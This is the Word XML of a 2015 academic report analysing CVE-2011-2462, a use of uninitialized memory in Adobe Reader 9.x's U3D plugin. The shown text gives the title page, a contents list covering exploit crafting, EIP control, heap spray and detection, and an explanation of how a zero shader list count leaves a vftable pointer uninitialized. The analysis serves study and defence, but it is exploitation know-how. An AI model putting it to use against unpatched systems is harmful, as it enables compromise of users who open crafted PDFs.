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aps/>
        </w:rPr>
        <w:id w:val="30557734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46037F">
            <w:trPr>
              <w:trHeight w:val="2880"/>
              <w:jc w:val="center"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="5000" w:type="pct"/>
              </w:tcPr>
              <w:p w:rsidR="0046037F" w:rsidRDefault="0046037F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1D6439">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing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340C1" w:rsidRDefault="000340C1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340C1" w:rsidRDefault="000340C1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340C1" w:rsidRDefault="000340C1" w:rsidP="0046037F">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:jc w:val="center"/>
                  <w:rPr>
                    <w:caps/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w:rsidR="000231FA" w:rsidRDefault="000231FA" w:rsidP="000231FA">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:rPr>
                    <w:caps/>
                  </w:rPr>
                </w:pPr>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="0046037F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037F" w:rsidRDefault="0046037F" w:rsidP="0046037F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 xml:space="preserve">Vulnerability </w:t>
                    </w:r>
                    <w:r w:rsidRPr="0046037F">
                      <w:rPr>
                        <w:sz w:val="80"/>
                        <w:szCs w:val="80"/>
                      </w:rPr>
                      <w:t>A</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:sz w:val="80"/>
                        <w:szCs w:val="80"/>
                      </w:rPr>
                      <w:t>nalysis</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
          <w:tr w:rsidR="0046037F">
            <w:trPr>
              <w:trHeight w:val="720"/>
              <w:jc w:val="center"/>
            </w:trPr>
            <w:sdt>
              <w:sdtPr>
                <w:rPr>
                  <w:sz w:val="80"/>
                  <w:szCs w:val="80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037F" w:rsidRDefault="00015672" w:rsidP="0046037F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80"/>
                        <w:szCs w:val="80"/>
                      </w:rPr>
                      <w:t>CVE-2011-2462</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
          <w:tr w:rsidR="0046037F" w:rsidTr="00434ABD">
            <w:trPr>
              <w:trHeight w:val="414"/>
              <w:jc w:val="center"/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="5000" w:type="pct"/>
                <w:vAlign w:val="center"/>
              </w:tcPr>
              <w:p w:rsidR="0046037F" w:rsidRDefault="0046037F">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:jc w:val="center"/>
                </w:pPr>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="0046037F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B7DAD" w:rsidRPr="000B7DAD" w:rsidRDefault="00434ABD" w:rsidP="000B7DAD">
                    <w:pPr>
                      <w:pStyle w:val="NoSpacing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0B7DAD">
                      <w:rPr>
                        <w:b/>
                        <w:bCs/>
                        <w:sz w:val="32"/>
                        <w:szCs w:val="32"/>
                      </w:rPr>
                      <w:t>Yeo Quan Yang</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:sdtContent>
            </w:sdt>
          </w:tr>
          <w:tr w:rsidR="004603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037F" w:rsidRPr="00280C0B" w:rsidRDefault="0046037F" w:rsidP="00B9229E">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:sz w:val="32"/>
                    <w:szCs w:val="32"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w:rsidR="00280C0B" w:rsidRDefault="00280C0B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a</w:t>
                </w:r>
                <w:r w:rsidRPr="00280C0B">
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:sz w:val="32"/>
                    <w:szCs w:val="32"/>
                  </w:rPr>
                  <w:t>n</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:sz w:val="32"/>
                    <w:szCs w:val="32"/>
                  </w:rPr>
                  <w:t>d</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00280C0B" w:rsidRDefault="00280C0B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  <w:p w:rsidR="00280C0B" w:rsidRDefault="00280C0B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Chang Yin Hong</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00280C0B" w:rsidRDefault="00280C0B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(Supervisor)</w:t>
                </w:r>
              </w:p>
              <w:p w:rsidR="00280C0B" w:rsidRDefault="00280C0B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  <w:p w:rsidR="001D6439" w:rsidRPr="00280C0B" w:rsidRDefault="001D6439" w:rsidP="00280C0B">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing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4F5E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5EA6" w:rsidRPr="004F5EA6" w:rsidRDefault="004F5EA6" w:rsidP="004F5EA6">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                  <w:jc w:val="center"/>
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:sz w:val="24"/>
                    <w:szCs w:val="24"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="004F5EA6">
                  <w:rPr>
                    <w:b/>
                    <w:bCs/>
                    <w:sz w:val="24"/>
                    <w:szCs w:val="24"/>
                  </w:rPr>
                  <w:t>December 2015</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w:rsidR="0046037F" w:rsidRDefault="0046037F"/>
        <w:p w:rsidR="0046037F" w:rsidRDefault="0046037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46037F">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="5000" w:type="pct"/>
              </w:tcPr>
              <w:p w:rsidR="0046037F" w:rsidRDefault="0046037F">
                <w:pPr>
                  <w:pStyle w:val="NoSpacing"/>
                </w:pPr>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w:rsidR="0046037F" w:rsidRDefault="0046037F"/>
        <w:p w:rsidR="006C0270" w:rsidRDefault="0046037F">
          <w:r>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
        <w:sdt>
          <w:sdtPr>
            <w:rPr>
              <w:smallCaps w:val="0"/>
              <w:spacing w:val="0"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
            </w:rPr>
            <w:id w:val="305577541"/>
            <w:docPartObj>
              <w:docPartGallery w:val="Table of Contents"/>
              <w:docPartUnique/>
            </w:docPartObj>
          </w:sdtPr>
          <w:sdtContent>
            <w:p w:rsidR="006C0270" w:rsidRDefault="006C0270">
              <w:pPr>
                <w:pStyle w:val="TOCHeading"/>
              </w:pPr>
              <w:r>
                <w:t>Table of Contents</w:t>
              </w:r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r>
                <w:fldChar w:fldCharType="begin"/>
              </w:r>
              <w:r w:rsidR="006C0270">
                <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
              </w:r>
              <w:r>
                <w:fldChar w:fldCharType="separate"/>
              </w:r>
              <w:hyperlink w:anchor="_Toc438718793" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>1. The vulnerability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4" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>2.Triggering the vulnerability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5" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3. Exploitation of vulnerability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6" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.1 Criteria for successful exploitation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7" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.2Crafting an exploit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8" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.2.1 Controlling the EIP register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799" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.2.2 Targeted Heap Spray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0" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>4. How is the JavaScript payload embedded and initiated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1" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>5. Detection and Classification Mechanism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2" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>5.1 Method #1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3" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>5.2 Method #2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4" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>5.3 Comparison of methods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5" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>6. Appendices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6" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>6.1 Heap Feng Shui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7" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>6.2 U3D File Format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8" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>6.3 Metasploit plugin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09" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>6.4 Details of the object and Vftable that should be have been initialized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42DAE" w:rsidRDefault="000A4F2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lang w:bidi="ar-SA"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc438718810" w:history="1">
                <w:r w:rsidR="00642DAE" w:rsidRPr="00454A62">
                  <w:rPr>
                    <w:rStyle w:val="Hyperlink"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>6.5JavaScript Heap SprayExample</w:t>
                </w:r>
                <w:r w:rsidR="00642DAE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642DAE">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc438718810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642DAE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11EF6" w:rsidRDefault="000A4F2C">
              <w:r>
                <w:fldChar w:fldCharType="end"/>
              </w:r>
            </w:p>
          </w:sdtContent>
        </w:sdt>
        <w:p w:rsidR="00622E48" w:rsidRPr="0046037F" w:rsidRDefault="00111EF6">
          <w:r>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00C3371A" w:rsidRDefault="00741306" w:rsidP="00414671">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc438718793"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00F3264E">
        <w:t>The vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00C3371A" w:rsidRDefault="00641BE8">
      <w:r w:rsidRPr="00111EF6">
        <w:t>The vulnerability exists in Adobe Acrobat Reader 9.x</w:t>
      </w:r>
      <w:r w:rsidR="00F1623E" w:rsidRPr="00111EF6">
        <w:t>, more specifically within the Right</w:t>
      </w:r>
      <w:r w:rsidR="00F1623E">
        <w:t xml:space="preserve"> Hemisphere</w:t>
      </w:r>
      <w:r w:rsidR="007217CF">
        <w:t xml:space="preserve"> 3difr</w:t>
      </w:r>
      <w:r w:rsidR="006B4C92">
        <w:t xml:space="preserve"> plugin</w:t>
      </w:r>
      <w:r>
        <w:t>. The vulnerability is due to the use of uninitial</w:t>
      </w:r>
      <w:r w:rsidR="00F1623E">
        <w:t>ized memory which resul</w:t>
      </w:r>
      <w:r w:rsidR="003357CC">
        <w:t xml:space="preserve">ts in arbitrary code execution. For the </w:t>
      </w:r>
      <w:r w:rsidR="00B41035">
        <w:t>rest of the report, the examples and explanation are all done</w:t>
      </w:r>
      <w:r w:rsidR="008C6BF7">
        <w:t xml:space="preserve"> using</w:t>
      </w:r>
      <w:r w:rsidR="003357CC">
        <w:t xml:space="preserve"> Adobe Reader 9.4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1623E" w:rsidRPr="00F1623E" w:rsidRDefault="00741306" w:rsidP="00414671">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc438718794"/>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="0034674C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00422EE0">
        <w:t>Triggering the vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00FE1FFD" w:rsidRDefault="00F1623E" w:rsidP="00AA109E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerability is triggered by </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t xml:space="preserve">embedding </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a specially crafted U3D </w:t>
      </w:r>
      <w:r w:rsidR="002942CF">
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidR="004D5DDB">
        <w:t xml:space="preserve"> into a PDF document, invoking the U3D rendering</w:t>
      </w:r>
      <w:r w:rsidR="00E73B78">
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="004D5DDB">
        <w:t xml:space="preserve"> causin</w:t>
      </w:r>
      <w:r w:rsidR="003416C6">
        <w:t>g the</w:t>
      </w:r>
      <w:r w:rsidR="00FE1FFD">
        <w:t xml:space="preserve"> use of</w:t>
      </w:r>
      <w:r w:rsidR="003416C6">
        <w:t xml:space="preserve"> an</w:t>
      </w:r>
      <w:r w:rsidR="00FE1FFD">
        <w:t xml:space="preserve"> uninitialized </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t xml:space="preserve">piece of </w:t>
      </w:r>
      <w:r w:rsidR="00FE1FFD">
        <w:t>memory</w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FE1FFD">
        <w:t xml:space="preserve"> resulting in </w:t>
      </w:r>
      <w:r w:rsidR="00B70302">
        <w:t xml:space="preserve">execution of </w:t>
      </w:r>
      <w:r w:rsidR="00FE1FFD">
        <w:t>arbitrary code</w:t>
      </w:r>
      <w:r w:rsidR="005F66A3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA109E" w:rsidRDefault="000A4F2C" w:rsidP="00AA109E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1026" style="position:absolute;margin-left:3.3pt;margin-top:-.5pt;width:79.55pt;height:15.05pt;z-index:251658240" filled="f" fillcolor="white [3201]" strokecolor="red" strokeweight="2.5pt">
            <v:shadow color="#868686"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00EB6D1F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5680001" cy="478363"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="Picture 1" descr="C:\Documents and Settings\Administrator\Desktop\Screen Shot 2015-12-17 at 3.1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Screen Shot 2015-12-17 at 3.17.41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D1F" w:rsidRDefault="00AA109E" w:rsidP="00AA109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1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> - A shader modifier block.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6D1F" w:rsidRDefault="00135FDF">
      <w:r>
        <w:t xml:space="preserve">A U3D </w:t>
      </w:r>
      <w:r w:rsidR="00EB6D1F">
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="00CC6A59">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB6D1F">
        <w:t>is generally made up of many blocks</w:t>
      </w:r>
      <w:r>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFE">
        <w:t xml:space="preserve"> the block of interest is the</w:t>
      </w:r>
      <w:r w:rsidR="00155C20">
        <w:t xml:space="preserve"> Shading Modifier block </w:t>
      </w:r>
      <w:r w:rsidR="00BC6736">
        <w:t>with a</w:t>
      </w:r>
      <w:r w:rsidR="00155C20">
        <w:t xml:space="preserve"> block type of “0xFFFFFF45”</w:t>
      </w:r>
      <w:r w:rsidR="00B47EFE">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EB6D1F">
        <w:t xml:space="preserve"> which is located at the start</w:t>
      </w:r>
      <w:r w:rsidR="00155C20">
        <w:t xml:space="preserve"> of the block. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47EFE" w:rsidRDefault="00B47EFE" w:rsidP="00B47EFE">
      <w:r>
        <w:t>A shader modifier block typically has a Shading Modifier Name, Chain index, Shading Attributes, Shader List Count, Shader Count and a Shader Name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA109E" w:rsidRDefault="00B47EFE" w:rsidP="00AA109E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4678045" cy="690880"/>
            <wp:effectExtent l="19050" t="0" r="8255" b="0"/>
            <wp:docPr id="6" name="Picture 3" descr="C:\Documents and Settings\Administrator\Desktop\Screen Shot 2015-12-17 at 3.4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Screen Shot 2015-12-17 at 3.49.59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9E" w:rsidRDefault="00AA109E" w:rsidP="00AA109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2</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00F3264E">
        <w:t xml:space="preserve">– Heap </w:t>
      </w:r>
      <w:r w:rsidR="009139E3">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r w:rsidR="00F3264E">
        <w:t>of size 4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA109E" w:rsidRDefault="000A4F2C" w:rsidP="00AA109E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1031" style="position:absolute;margin-left:77.25pt;margin-top:14.55pt;width:79.55pt;height:15.05pt;z-index:251662336" filled="f" fillcolor="white [3201]" strokecolor="red" strokeweight="2.5pt">
            <v:shadow color="#868686"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00AA109E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4682918" cy="560166"/>
            <wp:effectExtent l="19050" t="0" r="3382" b="0"/>
            <wp:docPr id="9" name="Picture 5" descr="C:\Documents and Settings\Administrator\Desktop\Screen Shot 2015-12-17 at 3.50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Desktop\Screen Shot 2015-12-17 at 3.50.43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49" cy="56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20" w:rsidRDefault="00AA109E" w:rsidP="00AA109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3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> – 0xbaadf00d indicates an uninitialized heap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009465B7" w:rsidRDefault="004D3DD5" w:rsidP="004D3DD5">
      <w:r>
        <w:t>A specially crafted U3D file containing a shading modifier with</w:t>
      </w:r>
      <w:r w:rsidR="009465B7">
        <w:t xml:space="preserve"> a shader list count of 0 will</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> result in a heap </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r>
        <w:t>of size 4 being allocated. However, as the shader list count is equal to 0, this piece of memory would not be initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721F8E" w:rsidRDefault="009465B7" w:rsidP="004D3DD5">
      <w:r>
        <w:t>In normal scenarios</w:t>
      </w:r>
      <w:r w:rsidR="008D5A1D">
        <w:t xml:space="preserve">, the heap </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r w:rsidR="008D5A1D">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00AA109E">
        <w:t xml:space="preserve"> size 4 will be</w:t>
      </w:r>
      <w:r w:rsidR="001C4F8A">
        <w:t xml:space="preserve"> used to hold a pointer </w:t>
      </w:r>
      <w:r w:rsidR="00BA171E">
        <w:t>to an object</w:t>
      </w:r>
      <w:r w:rsidR="003A478A">
        <w:t xml:space="preserve"> that contains a pointer to a virtual function </w:t>
      </w:r>
      <w:r w:rsidR="00BA171E">
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidR="003A478A">
        <w:t xml:space="preserve"> (vftable)</w:t>
      </w:r>
      <w:r w:rsidR="00B82C9F">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AA109E">
        <w:t xml:space="preserve">However, since </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t xml:space="preserve">this piece of </w:t>
      </w:r>
      <w:r w:rsidR="00AA109E">
        <w:t xml:space="preserve">memory is not initialized, if an attacker is able to control the </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t xml:space="preserve">contents in </w:t>
      </w:r>
      <w:r w:rsidR="00AA109E">
        <w:t>that address before the heap is allocated, the attack</w:t>
      </w:r>
      <w:r w:rsidR="00F3264E">
        <w:t xml:space="preserve">er would </w:t>
      </w:r>
      <w:r w:rsidR="00B82C9F">
        <w:t xml:space="preserve">then </w:t>
      </w:r>
      <w:r w:rsidR="00F3264E">
        <w:t>be able to exploit the vulnerability resulting in</w:t>
      </w:r>
      <w:r w:rsidR="00AA109E">
        <w:t xml:space="preserve"> arbitrary code execution. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721F8E" w:rsidRDefault="000A4F2C" w:rsidP="00835173">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:rect id="_x0000_s1033" style="position:absolute;margin-left:22.5pt;margin-top:105pt;width:283.5pt;height:79.5pt;z-index:251663360" filled="f" fillcolor="white [3201]" strokecolor="red" strokeweight="2.5pt">
            <v:shadow color="#868686"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="002E7DD3">
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3848100" cy="70104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8E" w:rsidRDefault="00721F8E" w:rsidP="00721F8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4</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve"> – Graph view of function responsible for initializing the heap of size 4</w:t>
      </w:r>
      <w:r w:rsidR="002E7DD3">
        <w:t xml:space="preserve"> in 3difr.x3d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA109E" w:rsidRDefault="00193401" w:rsidP="004D3DD5">
      <w:r>
        <w:t>Following figure 4, in the event where get_shader_list_count returns 0, the function will</w:t>
      </w:r>
      <w:r w:rsidR="005D0BCB">
        <w:t xml:space="preserve"> proceed with the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jump and skip the initialization of memory </w:t>
      </w:r>
      <w:r w:rsidR="004535EB">
        <w:t>contained in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the heap </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r>
        <w:t>of size 4</w:t>
      </w:r>
      <w:r w:rsidR="002E7DD3">
        <w:t xml:space="preserve"> (event in red box)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007F3924">
        <w:t xml:space="preserve"> On the other hand, when</w:t>
      </w:r>
      <w:r w:rsidR="00985FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E7DD3">
        <w:t>get_shader_list_count returns 1 or more, the program will c</w:t>
      </w:r>
      <w:r w:rsidR="007F3924">
        <w:t xml:space="preserve">heck for </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="007F3924">
        <w:t>existence of a</w:t>
      </w:r>
      <w:r w:rsidR="00985FF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B3A28">
        <w:t>shader</w:t>
      </w:r>
      <w:r w:rsidR="002E7DD3">
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidR="008018C2">
        <w:t>subsequently</w:t>
      </w:r>
      <w:r w:rsidR="002E7DD3">
        <w:t xml:space="preserve"> return a pointer to an object </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:t xml:space="preserve">containing a pointer to </w:t>
      </w:r>
      <w:r w:rsidR="004C1E04">
        <w:lastRenderedPageBreak/>
        <w:t>a vftable</w:t>
      </w:r>
      <w:r w:rsidR="002E7DD3">
        <w:t>. This pointer is then</w:t>
      </w:r>
      <w:r w:rsidR="009B3A28">
        <w:t xml:space="preserve"> copied </w:t>
      </w:r>
      <w:r w:rsidR="002E7DD3">
        <w:t xml:space="preserve">to the heap </w:t>
      </w:r>
      <w:r w:rsidR="006B229B">
        <w:t xml:space="preserve">chunk </w:t>
      </w:r>
      <w:r w:rsidR="002E7DD3">
        <w:t>of size 4 for use later</w:t>
      </w:r>
      <w:r w:rsidR="003868DF">
        <w:t>, more details of the object and vftable can be found in the appendices.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA109E" w:rsidRDefault="00AA109E" w:rsidP="00AA109E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4529455" cy="1754505"/>
            <wp:effectExtent l="19050" t="0" r="4445" b="0"/>
            <wp:docPr id="10" name="Picture 2" descr="C:\Documents and Settings\Administrator\Desktop\Screen Shot 2015-12-17 at 3.3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Screen Shot 2015-12-17 at 3.33.15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9E" w:rsidRDefault="00AA109E" w:rsidP="00AA109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5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00F3264E">
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00AC331D">
        <w:t xml:space="preserve"> rt3d.dll</w:t>
      </w:r>
      <w:r w:rsidR="00FC1E44">
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:r w:rsidR="00AC331D">
        <w:t xml:space="preserve"> that is </w:t>
      </w:r>
      <w:r w:rsidR="003868DF">
        <w:t xml:space="preserve">responsible for calling function </w:t>
      </w:r>
      <w:r w:rsidR="00FC1E44">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="003868DF">
        <w:t xml:space="preserve"> the virtual function table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC13BF" w:rsidRDefault="000A4F2C" w:rsidP="00EC13BF">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1035" style="position:absolute;margin-left:60.2pt;margin-top:136.6pt;width:51.1pt;height:10.55pt;z-index:251666432" filled="f" fillcolor="white [3201]" strokecolor="red" strokeweight="2.5pt">
            <v:shadow color="#868686"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_s1036" style="position:absolute;margin-left:222.8pt;margin-top:230.7pt;width:51.1pt;height:15.05pt;z-index:251667456" filled="f" fillcolor="white [3201]" strokecolor="red" strokeweight="2.5pt">
            <v:shadow color="#868686"/>
          </v:rect>
